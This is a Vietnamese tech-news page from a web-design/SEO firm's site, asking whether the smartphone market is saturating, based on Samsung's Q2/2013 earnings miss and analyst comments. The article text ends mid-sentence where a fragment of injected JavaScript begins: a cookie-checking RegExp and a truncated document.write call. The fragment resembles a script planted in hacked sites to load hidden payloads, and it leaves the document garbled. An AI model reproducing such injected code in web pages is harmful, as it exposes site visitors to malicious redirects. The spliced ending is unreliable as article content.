Thiết Kế Web, Dịch Vụ Seo, Marketing Online > Tin tức > Tin công nghệ > Có hay chăng thị trường smartphone đang dần bão hòa?

Có hay chăng thị trường smartphone đang dần bão hòa?

Khi thị trường điện thoại di động đã hết sức nóng, các nhà sản xuất cần phải tìm kiếm những phân khúc thị trường mới, cho ra nhiều sản phẩm mới để đẩy mạnh doanh số bán ra.

Việc hãng Samsung đạt lợi nhuận thấp hơn dự báo đang làm dấy lên những mối quan ngại cho rằng, thị trường smartphone đang có dấu hiệu bão hòa.

Doanh số của Samsung đang giảm xuống

Hãng Samsung kết thúc quý 2/2013 với doanh thu gần 57 nghìn tỷ won, lợi nhuận ròng đạt 9.5 nghìn tỷ (8.3 tỷ USD). Con số này mặc dù cao hơn nhiều so với 1 năm trước đây – 47 nghìn tỷ won và 6.7 nghìn tỷ won, nhưng lại thấp hơn nhiều so với dự báo của các nhà phân tích. Theo đó, các nhà phân tích đã dự đoán Samsung có thể đạt lợi nhuận khoảng 10 nghìn tỷ won.

Samsung là một nhà sản xuất smartphone lớn trê thế giới. Gần một nửa số smartphone bán ra tại Châu Âu đều được mang nhãn hiệu Galaxy. Vào cuối tháng 4, hãng này đã bán ra và nhanh chón cán mốc 10 triệu chiếc máy ngay trong tháng đầu tiên. Sau đó, hãng này đã phát hành thêm các phiên bản ăn theo của siêu phẩm Galaxy S4, chẳng hạn như chiếc S4 Mini, S4 LTE-Advance. Doanh số của Galaxy có ý nghĩa rất quan trọng với Samsung bới hãng có tới 2/3 lợi nhuận đến từ điện thoại.

Tuy nhiên, việc doanh số smartphone của Samsung không đạt được như kỳ vọng đang khiến các nhà phân tích và giới đầu tư cực kỳ lo lắng.

Bloomberg đã cảnh báo rằng: “thương hiệu Galaxy của Samsung đã bắt đầu yếu đi sau một vài năm ở trên đỉnh vinh quang”.

Chủ tịch hãng phân tích thị trường TechMarketView là Richard Holway cho biết, vấn đề chính nằm ở chỗ thị trường smartphone ở các nước đã phát triển đang rơi vào trạng thái bão hòa.

Kết quả là các nhà sản xuất buộc phải cho ra mắt những sản phẩm với mức giá rẻ hơn cho các thị trường đang phát triển. “mọi nhà sản xuất đều cố gắng tung ra các sản phẩm giá rẻ nhằm tăng doanh số ở bên ngoài những thị trường đang phát triển”.

Nói về triển vọng của các thiết bị mới (thiết bị đeo tay), ông Holway cho rằng: “rất khó để kiếm được lợi nhuận tương tự từ các sản phẩm thay thế điện thoại thông minh, ngay cả iPad, iTV hay iWatch đều không thể”. (new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1”)+”= .write(‘